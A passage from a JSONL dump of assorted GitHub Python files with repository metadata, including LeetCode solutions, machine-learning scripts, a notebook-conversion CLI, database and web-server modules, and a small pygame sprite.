###\n","repo_name":"huangruiqi98/instrument-reser","sub_path":"migrations/versions/6717af29eb23_initial_migration.py","file_name":"6717af29eb23_initial_migration.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15545803801","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def binaryTreePaths(self, root: Optional[TreeNode]) -> List[str]:\n # pathStr += root.val + '->'\n def dfs(root, path, res):\n if not root: return\n if not root.left and not root.right:\n path += str(root.val)\n res.append(path)\n return\n dfs(root.left, path + str(root.val) + '->', res)\n dfs(root.right, path + str(root.val) + '->', res)\n\n if not root: return []\n if not root.left and not root.right: return [str(root.val)]\n path, res = '', []\n dfs(root, path, res)\n return res","repo_name":"HuKai97/Leetcode","sub_path":"1-树/前序/Leetcode257. 二叉树的所有路径(12).py","file_name":"Leetcode257. 二叉树的所有路径(12).py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"6557010259","text":"import matplotlib.pyplot as plt\nimport itertools\nimport torch\nimport os\nimport numpy as np\nfrom torch.autograd import Variable\n\nTEST_ROW = 5\nDIM_NOISE = 128\n\nfixed_z_ = torch.randn((TEST_ROW * TEST_ROW, DIM_NOISE)) # fixed noise\nfixed_z_ = Variable(fixed_z_.cuda(), volatile=True)\n\n\ndef find_classes(dir):\n classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n\ndef show_result(num_epoch, Gs, Gc, show=False, save=False, path='result.png', isFix=False):\n z_ = torch.randn((TEST_ROW*TEST_ROW, DIM_NOISE))\n z_ = Variable(z_.cuda(), volatile=True)\n\n y_c = []\n for i in range(TEST_ROW):\n y_c.append([i] * TEST_ROW)\n y_idx = np.array(y_c, dtype=np.int32)\n y_idx = y_idx.reshape(TEST_ROW*TEST_ROW)\n y_c = np.eye(5, dtype=np.float32)[y_idx]\n y_c = torch.from_numpy(y_c)\n y_c_ = Variable(y_c.cuda(), volatile=True)\n\n Gc.eval()\n if isFix:\n test_Ms = Gs(fixed_z_)\n else:\n test_Ms = Gs(z_)\n test_x_c_fake = Gc(test_Ms, y_c_)\n Gc.train()\n\n size_figure_grid = 5\n fig, ax = plt.subplots(size_figure_grid, size_figure_grid, figsize=(5, 5))\n for i, j in itertools.product(range(size_figure_grid), range(size_figure_grid)):\n ax[i, j].get_xaxis().set_visible(False)\n ax[i, j].get_yaxis().set_visible(False)\n\n for k in range(5*5):\n i = k // 5\n j = k % 5\n ax[i, j].cla()\n ax[i, j].imshow((test_x_c_fake[k].cpu().data.numpy().transpose(1, 2, 0) + 1) / 2)\n\n label = 'Epoch {0}'.format(num_epoch)\n fig.text(0.5, 0.04, label, ha='center')\n plt.savefig(path)\n\n if show:\n plt.show()\n else:\n plt.close()\n\n\ndef show_train_hist(hist, show=False, save=False, path='Train_hist.png'):\n x = range(len(hist['D_losses']))\n\n y1 = hist['D_losses']\n y2 = hist['G_losses']\n\n plt.plot(x, y1, label='D_loss')\n plt.plot(x, y2, label='G_loss')\n\n plt.xlabel('Iter')\n plt.ylabel('Loss')\n\n plt.legend(loc=4)\n plt.grid(True)\n plt.tight_layout()\n\n if save:\n plt.savefig(path)\n\n if show:\n plt.show()\n else:\n plt.close()","repo_name":"RyanHTR/Fused_SNGAN","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11178779961","text":"import numpy as np\nfrom server import utils\nimport time\nimport pickle\n\nfrom keras.models import load_model\n\nimport random\n\nimport tensorflow as tf\nfrom model import Model\n\n\ndef get_ngram_model(path):\n file = open(path, \"rb\")\n t = pickle.load(file)\n file.close()\n return t\n\n\ndef sample(preds, temperature=1.0):\n preds = np.asarray(preds).astype('float64')\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n probas = np.random.multinomial(1, preds, 1)\n return np.argmax(probas)\n\n\ndef generate_poem(diversity, range_, n_line, th=200, model=None):\n sentences = _generate_sentences(diversity=diversity, range_=range_, model=model)\n perp_sent_pair_norm = _calculate_perplexity(sentences, model)\n\n indices = np.arange(len(perp_sent_pair_norm))\n np.random.shuffle(indices)\n poem = \"\"\n c = 0\n for i in indices:\n if perp_sent_pair_norm[i][0] < th:\n poem += perp_sent_pair_norm[i][1].capitalize() + '\\n'\n c += 1\n if c % 4 == 0:\n poem += '\\n'\n if c >= n_line:\n break\n poem = poem.replace('\\n', \"
\")\n return poem\n\n\ndef _calculate_perplexity(sentences, model):\n\n perp_sent_pair_norm = []\n for s in sentences:\n if len(s.split()) >= 3:\n perp_sent_pair_norm.append((model.trigram_model.perplexity(s) / len(s.split()), s))\n # print(lm.perplexity(s), \":\", s)\n\n perp_sent_pair_norm = sorted(perp_sent_pair_norm)\n\n return perp_sent_pair_norm\n\n\ndef _generate_sentences(diversity=0.5, range_=500, model=None):\n global graph\n with graph.as_default():\n start_index = random.randint(0, len(model.text) - maxlen - 1)\n sentence = model.text[start_index: start_index + maxlen]\n generated = \"\"\n for i in range(range_):\n x_pred = np.zeros((1, maxlen, len(model.chars)))\n for t, char in enumerate(sentence):\n x_pred[0, t, model.char_indices[char]] = 1.\n\n preds = model.keras_model.predict(x_pred, verbose=0)[0]\n next_index = sample(preds, diversity)\n next_char = model.indices_char[next_index]\n\n generated += next_char\n sentence = sentence[1:] + next_char\n sentences = generated.split('\\n')[1:]\n return sentences\n\n\ndef generate_acrostic(name, diversity=0.5, model=None):\n global graph\n with graph.as_default():\n start_index = random.randint(0, len(model.text) - maxlen - 1)\n sentence = model.text[start_index: start_index + maxlen]\n generated = \"\"\n name += \"\\n\"\n for letter in name:\n while True:\n x_pred = np.zeros((1, maxlen, len(model.chars)))\n for t, char in enumerate(sentence):\n x_pred[0, t, model.char_indices[char]] = 1.\n\n preds = model.keras_model.predict(x_pred, verbose=0)[0]\n next_index = sample(preds, diversity)\n next_char = model.indices_char[next_index]\n generated += next_char\n if next_char == '\\n':\n sentence = sentence[2:] + next_char + letter\n generated += letter\n break\n sentence = sentence[1:] + next_char\n return generated\n\n\ndef load_category_model(text_path, network_path, trigram_path):\n text = utils.load_doc(text_path)\n trigram = get_ngram_model(trigram_path)\n keras_model = load_model(network_path)\n chars = sorted(list(set(text)))\n char_indices = dict((c, i) for i, c in enumerate(chars))\n indices_char = dict((i, c) for i, c in enumerate(chars))\n model = Model(text, trigram, keras_model, chars, char_indices, indices_char)\n return model\n\n\ndef load_models():\n global graph\n with graph.as_default():\n print(\"Models loading..\")\n s = time.time()\n text1 = \"./clean_poems/category_1.txt\"\n text2 = \"./clean_poems/category_2.txt\"\n text3 = \"./clean_poems/category_3.txt\"\n\n category_1_model_path = \"./models/category_1/2019-05-20 16_43_17_category_1.txt_tr_20.h5\"\n category_2_model_path = \"./models/category_2/2019-05-11 01_57_23.hdf\"\n category_3_model_path = \"./models/category_3/2019-05-11 01_58_50.hdf\"\n\n cat1_trigram_path = \"./models/category_1/category_1_trigram_model.pkl\"\n cat2_trigram_path = \"./models/category_2/category_2_trigram_model.pkl\"\n cat3_trigram_path = \"./models/category_3/category_3_trigram_model.pkl\"\n\n cat1_model = load_category_model(text1, category_1_model_path, cat1_trigram_path)\n cat2_model = load_category_model(text2, category_2_model_path, cat2_trigram_path)\n cat3_model = load_category_model(text3, category_3_model_path, cat3_trigram_path)\n print(\"Models loaded in\", time.time()-s)\n return cat1_model, cat2_model, cat3_model\n\n\nmaxlen = 20\n\nmodels = {1: None, 2: None, 3: None}\ngraph = tf.get_default_graph()\n\ncat1_model, cat2_model, cat3_model = load_models()\nmodels[1] = cat1_model\nmodels[2] = cat2_model\nmodels[3] = cat3_model\n\npoem = generate_acrostic(name=\"samet\", diversity=0.5, model=models[1])\nprint(poem)\n\nfor i in poem.split('\\n')[1:]:\n print(i.capitalize())\n","repo_name":"mertsurucu/poetAI","sub_path":"server/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"28968260973","text":"from diffusers import DiffusionPipeline, DPMSolverMultistepScheduler\nimport torch\nimport json\nfrom tqdm import tqdm\n\npipe = DiffusionPipeline.from_pretrained(\"runwayml/stable-diffusion-v1-5\", torch_dtype=torch.float16)\npipe.scheduler = DPMSolverMultistepScheduler.from_config(pipe.scheduler.config)\npipe.to(\"cuda\")\npipe.unet.load_attn_procs(\"../../checkpoints/dreambooth/\")\n\n# Output\n# Read metadata from JSONL file\nmetadata_file = \"../../data/openpath/test/metadata.jsonl\"\nwith open(metadata_file, \"r\") as f:\n metadata_list = [json.loads(line) for line in f]\n\n# For each entry in metadata\nfor i in tqdm(range(200)):\n metadata = metadata_list[i]\n # Use the \"text\" field as prompt\n prompt = \"sks\" + metadata[\"text\"]\n \n try:\n # Generate image for the current prompt using the specified model method\n image = pipe(prompt, num_inference_steps=30, guidance_scale=7.5).images[0]\n \n # Save the generated image\n output_path = f\"../../out/dreambooth/{metadata['file_name'].replace('.jpg', '')}_out.png\"\n image.save(output_path)\n except Exception as e:\n print(f\"Error processing entry {i}: {e}\")\n\nprint(\"Inference completed.\")\n","repo_name":"ekkin2/pathology-diffusion","sub_path":"scripts/inference/dreambooth-inference.py","file_name":"dreambooth-inference.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31223979392","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport pathlib\nimport argparse\nimport jupyter\n\nmy_parser = argparse.ArgumentParser()\nmy_parser.add_argument(\n '--input', help='File to convert', required=True,\n)\n# mp_parser.add_argument(\n# '-i', '--input_files',\n\nmy_parser.add_argument(\n '-o', '--output', help='Output file', required=False,\n)\n\n# Verify if the file exists\nfiles_arg = my_parser.parse_args().file\nfile = pathlib.Path(files_arg)\nif not file.exists():\n print(f'File {files_arg} does not exist')\n sys.exit(1)\n\ndef main():\n print(f'File Found: {files_arg}')\n print('Full path:', file.resolve())\n os.system(f'jupyter nbconvert --to markdown {files_arg} --output {my_parser.parse_args().output}')\n print(f'Converted to markdown: {my_parser.parse_args().output}')\n print('Done')\n print('Conversion done')\n sys.exit(0)\n\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n\n\n\n# my_parser.add_argument('--input', '-e', action='store', type=int, required=True, default=\"0\")\n# my_parser.add_argument('--id', '-i', action='store', type=int)\n\n# args = my_parser.parse_args()\n\n# print(args.input)\n","repo_name":"aka-vm/my-utils","sub_path":"ML/nb-convert.py","file_name":"nb-convert.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43566925938","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nimport pandas as pd\r\nimport random\r\n\r\n\r\ndf = pd.read_csv('Total.csv')\r\ndocuments = df['track_en']\r\n\r\ntracks = []\r\nfor track in df['track_en']:\r\n track = bytes(track, 'utf-8').decode()\r\n tracks.append(track)\r\n\r\nraw_documents = random.sample(tracks, 20)\r\n\r\ndef create_binary_vector(raw_attr, entire_attributes):\r\n vec1 = []\r\n for t in entire_attributes:\r\n if t in raw_attr:\r\n vec1.append(1)\r\n else:\r\n vec1.append(0)\r\n return vec1\r\n\r\n\r\ndef consine_similarity(raw1, raw2):\r\n attribute_list = []\r\n raw1_attrs = raw1.split()\r\n raw2_attrs = raw2.split()\r\n\r\n # form attribute list\r\n for t in (raw1_attrs + raw2_attrs):\r\n if t not in attribute_list:\r\n attribute_list.append(t)\r\n\r\n # form vector for similarity\r\n vec1 = create_binary_vector(raw1_attrs, attribute_list)\r\n vec2 = create_binary_vector(raw2_attrs, attribute_list)\r\n\r\n sim = cosine_similarity([vec1], [vec2])\r\n sim1 = sim[0]\r\n\r\n return sim1[0]\r\n\r\n\r\ndef compute_pair_similarities(raw_documents):\r\n index1 = 0\r\n doc_count = len(raw_documents)\r\n sims = np.zeros((doc_count, doc_count))\r\n for raw1 in raw_documents:\r\n index2 = 0\r\n for raw2 in raw_documents:\r\n sim = consine_similarity(raw1, raw2)\r\n sims[index1, index2] = sim\r\n\r\n index2 = index2 + 1\r\n\r\n index1 = index1 + 1\r\n return sims\r\n\r\n\r\nsims = compute_pair_similarities(raw_documents)\r\n#print(sims)\r\nax = sns.heatmap(sims, linewidth=0.01)\r\nplt.show()","repo_name":"jy02377594/AI-Learning","sub_path":"pythonProject/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42122925791","text":"# A self-dividing number is a number that is divisible by every digit it contains.\n\n# For example, 128 is a self-dividing number because 128 % 1 == 0, 128 % 2 == 0, and 128 % 8 == 0.\n\n# Also, a self-dividing number is not allowed to contain the digit zero.\n\n# Given a lower and upper number bound, output a list of every possible self dividing number, including the bounds if possible.\n\n# Example 1:\n\n# Input: \n# left = 1, right = 22\n# Output: [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 15, 22]\n\n# Note:\n# The boundaries of each input argument are 1 <= left <= right <= 10000.\n\nclass Solution:\n def selfDividingNumbers(self, left, right):\n \"\"\"\n :type left: int\n :type right: int\n :rtype: List[int]\n \"\"\"\n def checkSelfDividingNumbers(num):\n tmp, dividend = num, 0\n while tmp != 0:\n diviend = tmp % 10\n tmp = tmp // 10\n if diviend == 0 or i % diviend != 0:\n return False\n return True\n \n res = []\n for i in range(left, right + 1):\n if checkSelfDividingNumbers(i):\n res.append(i)\n return res\n\n# Although mine is faster, but the lambda aproach below is so elegent\nclass Solution(object):\n def selfDividingNumbers(self, left, right):\n is_self_dividing = lambda num: '0' not in str(num) and all(num % int(digit) == 0 for digit in str(num))\n return list(filter(is_self_dividing, range(left, right + 1)))\n","repo_name":"lucasloo/leetcodepy","sub_path":"solutions/728SelfDividingNumbers.py","file_name":"728SelfDividingNumbers.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74608115288","text":"# 演示文本单词和字符的one-hot编码\nimport numpy as np\nimport string\nfrom keras.preprocessing.text import Tokenizer\n\nsamples = ['The cat sat on the mat.', 'The dog ate my homework.']\n# ====================对单词进行编码\ntoken_index = {} # 构建数据中所有标记的索引\nfor sample in samples:\n for word in sample.split():\n if word not in token_index:\n token_index[word] = len(token_index) + 1 # 为每个唯一单词指定唯一索引\n\nmax_length = 10 # 对前十个单词进行one-hot编码\n# 保存编码在results里\nresults = np.zeros(shape=(len(samples), max_length,\n max(token_index.values()) + 1))\n\nfor i, sample in enumerate(samples):\n for j, word in list(enumerate(sample.split()))[:max_length]:\n index = token_index.get(word)\n results[i, j, index] = 1.\n\nprint(results)\n\n# =======================对字符进行one-hot编码\ncharacters = string.printable # 获取所有可打印的ASCII字符\ntoken_index = dict(zip(range(1, len(characters) + 1), characters))\n\nmax_length = 50\nresults = np.zeros((len(samples), max_length, max(token_index.keys()) + 1))\nfor i, sample in enumerate(samples):\n for j, character in enumerate(sample):\n index = token_index.get(character)\n results[i, j, index] = 1.\n\nprint(results)\n\n# =============================keras实现单词one-hot编码\n# 创建一个分词器,设置值考虑前1000个单词\ntokenizer = Tokenizer(num_words=1000)\n# 构建单词索引\ntokenizer.fit_on_texts(samples)\n# 将字符串转换为整数索引列表\nsequences = tokenizer.texts_to_sequences(samples)\n# 得到one-hot二进制编码\none_hot_results = tokenizer.texts_to_matrix(samples, mode='binary')\nprint(one_hot_results)\n# 得到单词索引\nword_index = tokenizer.word_index\nprint('Found %s unique tokens.' % len(word_index))\n\n# ==========================one-hot哈希编码\ndimensionality = 1000 # 哈希长度为1000,如果单词个数接近1000,会出现哈希冲突,暴露缺点\nmax_length = 10\n\nresults = np.zeros((len(samples), max_length, dimensionality))\nfor i, sample in enumerate(samples):\n for j, word in list(enumerate(sample.split()))[:max_length]:\n index = abs(hash(word)) % dimensionality\n results[i, j, index] = 1.\n\nprint(results)\n","repo_name":"BarretRen/PythonCode","sub_path":"deep learning/12_one_shot_encode.py","file_name":"12_one_shot_encode.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37220600022","text":"\"\"\"Add language field to post table\n\nRevision ID: d055880868f7\nRevises: 2a3289732dbc\nCreate Date: 2020-09-22 11:47:44.548685\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd055880868f7'\ndown_revision = '2a3289732dbc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('post', sa.Column('language', sa.String(length=5), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('post', 'language')\n # ### end Alembic commands ###\n","repo_name":"GitauHarrison/work-gossip-chat-app","sub_path":"migrations/versions/d055880868f7_add_language_field_to_post_table.py","file_name":"d055880868f7_add_language_field_to_post_table.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"20906712867","text":"\"\"\"\nTVM backend for MLPerf inference vision benchmark\n\nDevelopers: Alexander Peskov, Thierry Moreau, Grigori Fursin\n\"\"\"\nimport backend\n\nfrom tvm.contrib.async_launcher import AsyncGraphExecutor\n\nimport numpy as np\nimport os\n\n\nclass BackendTVM1(backend.Backend):\n def __init__(self):\n super(BackendTVM1, self).__init__()\n self.executor = None\n\n def version(self):\n return \"N/A : TODO\"\n\n def name(self):\n \"\"\"Name of the runtime.\"\"\"\n return \"tvm\"\n\n def image_format(self):\n \"\"\"Requested image_format. Use a more popular layout NCHW\"\"\"\n return \"NCHW\"\n\n def load(self, model_path, inputs=None, outputs=None):\n \"\"\"Load model and find input/outputs from the model file.\"\"\"\n self.executor = AsyncGraphExecutor(model_path)\n\n self.inputs = inputs\n self.outputs = outputs\n\n if not inputs:\n self.inputs = [str(idx) for idx in range(self.executor.get_num_outputs())]\n if not outputs:\n self.outputs = [str(idx) for idx in range(self.executor.get_num_outputs())]\n\n executor_type = os.environ.get('MLPERF_TVM_EXECUTOR', 'graph')\n assert executor_type in (\"graph\", \"debug\")\n\n return self\n\n def predict(self, feed):\n \"\"\"Run the prediction.\"\"\"\n inputs = [None] * len(self.inputs)\n for i_name, i_data in feed.items():\n input_idx = self.inputs.index(i_name)\n inputs[input_idx] = i_data\n\n # Run TVM inference\n res = self.executor.infer(inputs)\n\n # Assume that only one output produced\n tvm_output = [res]\n\n return tvm_output\n\n","repo_name":"octoml/mlcommons-inference","sub_path":"vision/classification_and_detection/python/backend_tvm_1.py","file_name":"backend_tvm_1.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"16798905408","text":"import numpy\nimport pandas\n\nwith open('data/counts.txt', 'rt') as f:\n data_table = pandas.read_csv(f, index_col=0)\n print(data_table.iloc[:5, :5])\n\nsamples = list(data_table.columns)\n\nwith open('data/genes.csv', 'rt') as g:\n gene_info = pandas.read_csv(g, index_col=0)\n print(gene_info.iloc[:5])\n\nprint('Genes in data_table: ', data_table.shape)\nprint('Genes in gen_info: ', gene_info.shape)\n\nmatched_index = pandas.Index.intersection(data_table.index, gene_info.index)\ncounts = numpy.asarray(data_table.loc[matched_index], dtype=int)\n\ngene_names = numpy.array(matched_index)\ngene_length = numpy.asarray(\n gene_info.loc[matched_index]['GeneLength'], dtype=int)\n\n","repo_name":"INKCIO/AIPreview","sub_path":"explore_gene.py","file_name":"explore_gene.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18526977640","text":"import pygame\nimport math\n\nclass Scrap(pygame.sprite.Sprite):\n def __init__(self, x, y):\n super().__init__()\n \n # Enemy Stats\n self.picture_path = \"Assets\\Img\\Robot_Scrap\\\\robot_scrap_2.png\"\n self.size = 40\n self.x = x\n self.y = y\n self.speed = 10\n\n # Load multiple sprites for different directions\n self.image = pygame.transform.scale(pygame.image.load(self.picture_path).convert_alpha(), (self.size, self.size))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n\n def move(self, player_x, player_y):\n dx = player_x - self.rect.centerx\n dy = player_y - self.rect.centery\n distance_to_player = max(1, math.hypot(dx, dy))\n \n if distance_to_player < 200:\n dx /= distance_to_player\n dy /= distance_to_player\n\n self.rect.centerx += dx * self.speed\n self.rect.centery += dy * self.speed\n \n def update(self, player_x, player_y):\n self.move(player_x, player_y)\n\n","repo_name":"BeanSparrow/ChatGPT-Assisted-PyGame","sub_path":"modules/scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71415247449","text":"#!/usr/bin/env python3\n\"\"\"DB module\n\"\"\"\nfrom sqlalchemy import create_engine, inspect\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.session import Session\nfrom sqlalchemy.exc import InvalidRequestError\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom typing import List\n\nfrom user import Base, User\n\n\nclass DB:\n \"\"\"DB class\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize a new DB instance\n \"\"\"\n self._engine = create_engine(\"sqlite:///a.db\", echo=False)\n Base.metadata.drop_all(self._engine)\n Base.metadata.create_all(self._engine)\n self.__session = None\n\n @property\n def _session(self) -> Session:\n \"\"\"Memoized session object\n \"\"\"\n if self.__session is None:\n DBSession = sessionmaker(bind=self._engine)\n self.__session = DBSession()\n return self.__session\n\n def add_user(self, email: str,\n hashed_password: str) -> User:\n '''Creates a new user n adds to the db'''\n session = self._session\n newUser = User()\n newUser.email = email\n newUser.hashed_password = hashed_password\n session.add(newUser)\n session.commit()\n return newUser\n\n def find_user_by(self, **kwargs) -> User:\n '''Finds the first occurence of a user'''\n session = self._session\n try:\n user = session.query(User).filter_by(**kwargs).first()\n if user is None:\n raise NoResultFound\n return user\n except KeyError:\n raise InvalidRequestError\n\n def update_user(self, user_id: int, **kwargs) -> None:\n '''Updates a user by the passed params'''\n user = self.find_user_by(id=user_id)\n for k, v in kwargs.items():\n if hasattr(user, k):\n setattr(user, k, v)\n else:\n raise ValueError\n return None\n","repo_name":"phurhard/alx-backend-user-data","sub_path":"0x03-user_authentication_service/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27180462848","text":"c = ('\\033[m',\r\n '\\033[0;30;41m',\r\n '\\033[0;30;42m',\r\n '\\033[0;30;43m',\r\n '\\033[0;30;44m',\r\n '\\033[0;30;45m',\r\n '\\033[7;30;m',);\r\n\r\ndef titulo(msg, cor=0):\r\n \"\"\"\r\n -> Função para dar um titulo ao programa\r\n :param msg: Valor a ser exibido\r\n :return: Valor formatado entre linhas\r\n \"\"\"\r\n tam = len(msg) + 4\r\n print(c[cor], end='')\r\n print('~' * tam)\r\n print(f' {msg}')\r\n print('~' * tam)\r\n print(c[0], end='')\r\n\r\n\r\ndef ajuda(txt):\r\n from time import sleep\r\n titulo(f'Acessando o manual do comando {txt}...', 4)\r\n sleep(1)\r\n print(c[5])\r\n help(txt)\r\n print(c[0])\r\n\r\n\r\n# programa principal\r\ncomando = ''\r\nwhile True:\r\n titulo(\"Sistema de Ajuda PyHelp\", 2)\r\n comando = str(input('Função ou Biblioteca (FIM TERMINA) > '))\r\n if comando.upper() == \"FIM\":\r\n break\r\n else:\r\n ajuda(comando)\r\ntitulo('ATÉ LOGO!', 1)\r\n","repo_name":"Amonvix/Aulas_Python","sub_path":"Exercicio/ex106.py","file_name":"ex106.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41698131744","text":"import os\n\n\nfrom asyncpg import create_pool\nfrom sanic import Sanic\nfrom sanic.response import json\n\n\napp = Sanic(__name__)\n\n\n# https://stackoverflow.com/questions/49978507/using-asyncpg-connection-pool-with-sanic\n@app.listener('before_server_start')\nasync def init_pg(app, loop):\n class Pg:\n def __init__(self, pg_pool):\n self.pg_pool = pg_pool\n \n async def fetch(self, sql, *args, **kwargs):\n async with self.pg_pool.acquire() as connection:\n return await connection.fetch(sql, *args, **kwargs)\n \n async def execute(self, sql, *args, **kwargs):\n async with self.pg_pool.acquire() as connection:\n return await connection.execute(sql, *args, **kwargs)\n\n app.pg_pool = await create_pool(\n os.environ['DATABASE_URL'],\n loop=loop,\n )\n app.pg = Pg(app.pg_pool)\n print('-------- setup connection pool --------')\n\n\n@app.listener('after_server_stop')\nasync def cleanup_pg(app, loop):\n await app.pg_pool.close()\n print('-------- shutdown connection pool --------')\n\n\n@app.route(\"/\")\nasync def root(req):\n result = await req.app.pg.fetch('SELECT 1 as a, 2 as b')\n print(result)\n return json([dict(r) for r in result])\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=int(os.environ.get('PORT', '8000')))\n","repo_name":"thejimmyg/sanic-postgres-docker","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75007690327","text":"import unittest\n\nfrom core.database import CommandBuilderFactory\nfrom core.database import FetchXmlParser\nfrom config import CONFIG\nfrom core.appinfo import AppInfo\nfrom core.plugin import Plugin\nfrom services.database import DatabaseServices\nfrom core import log\n\n\nclass TestPluginExecution(unittest.TestCase):\n def setUp(self):\n AppInfo.init(__name__, CONFIG['default'])\n session_id=AppInfo.login(\"root\",\"password\")\n self.context=AppInfo.create_context(session_id)\n\n def test_execution(self):\n from iot_set_node_status import execute\n\n self._create_node(self.context)\n\n params={\"data\":\n {\"node_name\": {\"value\": \"test\", \"value_old\": None},\n \"ip_address\": {\"value\": \"192.168.0.1\", \"value_old\": None}, \"source_id\": {\"value\": \"1\", \"value_old\": None} }}\n execute(self.context, {}, params)\n\n\n fetch=f\"\"\"\n \n \n \n \n \n \n \n \n \n \"\"\"\n fetchparser=FetchXmlParser(fetch, self.context)\n DatabaseServices.exec(fetchparser, self.context, run_as_system=True)\n\n\n\n\n params={\"data\":\n {\"node_name\": {\"value\": \"test-1\", \"value_old\": None},\n \"ip_address\": {\"value\": \"192.168.0.1\", \"value_old\": None}, \"source_id\": {\"value\": \"1\", \"value_old\": None} }}\n #execute(self.context, {}, params)\n\n def tearDown(self):\n AppInfo.save_context(self.context, True)\n AppInfo.logoff(self.context)\n\n def _create_node(self, context):\n fetch=f\"\"\"\n \n
\n \n \n \n \n \n \"\"\"\n fetchparser=FetchXmlParser(fetch, context)\n rs=DatabaseServices.exec(fetchparser, context, fetch_mode=1, run_as_system=True)\n if not rs.get_eof():\n return\n\n fetch=f\"\"\"\n \n
\n \n \n \n \n \n \n \"\"\"\n fetchparser=FetchXmlParser(fetch, context)\n DatabaseServices.exec(fetchparser, context, run_as_system=True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"dk9mbs/IoTSensorNet","sub_path":"restapi/test/test_iot_log.py","file_name":"test_iot_log.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"8864868863","text":"#!/usr/bin/python3\nfrom machinehub.server.service.authorize import BasicAuthorizer, BasicAuthenticator\nfrom machinehub.server.rest.server import MachinehubServer\nfrom machinehub.server.crypto.jwt.jwt_credentials_manager import JWTCredentialsManager\nfrom datetime import timedelta\nfrom machinehub.config import machinehub_conf\n\n\nclass ServerLauncher():\n def __init__(self, users=None):\n authorizer = BasicAuthorizer()\n users = users or {}\n authenticator = BasicAuthenticator(users)\n credentials_manager = JWTCredentialsManager(\"unicornio_rosa\", timedelta(minutes=121))\n\n self.ra = MachinehubServer(machinehub_conf.server.port, False, credentials_manager, authorizer, authenticator)\n\n def launch(self):\n self.ra.run(host=machinehub_conf.server.host)\n\n\nlauncher = ServerLauncher(machinehub_conf.users._sections)\napp = launcher.ra.root_app\n\n\ndef main(*args):\n launcher.launch()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"davidsanfal/machinehub","sub_path":"python/machinehub/server/server_launcher.py","file_name":"server_launcher.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"9847057628","text":"# Import the dependencies.\nfrom flask import Flask, jsonify\nfrom sqlalchemy import create_engine, func\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.ext.automap import automap_base\nimport numpy as np\nimport datetime as dt\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n\n# reflect an existing database into a new model\nBase = 